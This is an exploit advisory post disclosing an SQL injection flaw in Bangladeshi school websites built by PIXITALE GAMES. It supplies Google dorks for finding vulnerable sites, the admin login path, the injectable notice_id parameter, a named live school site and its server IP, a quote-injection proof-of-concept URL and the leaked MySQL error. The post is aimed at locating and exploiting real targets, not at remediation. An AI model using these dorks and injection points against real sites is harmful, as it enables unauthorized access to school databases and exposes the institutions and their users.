facebook facebook twitter rss

By Prodigy PixiTale Games Bangladesh Education SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019
# Exploit Title : By Prodigy PixiTale Games Bangladesh Education SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : pixitale.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Designed by PIXITALE GAMES.'' site:edu.bd
intext:''By Prodigy. Copyright © PIXITALE GAMES''
intext:''Copyright © 2017 PIXITALE GAMES.
Designed by PIXITALE GAMES. All rights reserved.''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

############################################################

# Admin Panel Login Path :
**************************

/admin/

# SQL Injection Exploit :
**************************

/notice.php?notice_id=[SQL Injection]

############################################################

# Example Vulnerable Site =>
**************************

Note => (192.185.171.2) => There are 46 domains hosted on this server.

[+] sjs.edu.bd/notice.php?notice_id=439%27

=> [ Proof of Concept ] => archive.fo/ePLlF

############################################################

# SQL Database Error :
********************

Last query: SELECT * FROM notice WHERE id='439''
Mysql error: You have an error in your SQL syntax;
check the manual that corresponds to your
MySQL server version for the
right syntax to use near ''439''' at line 1

############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

Like us on Facebook :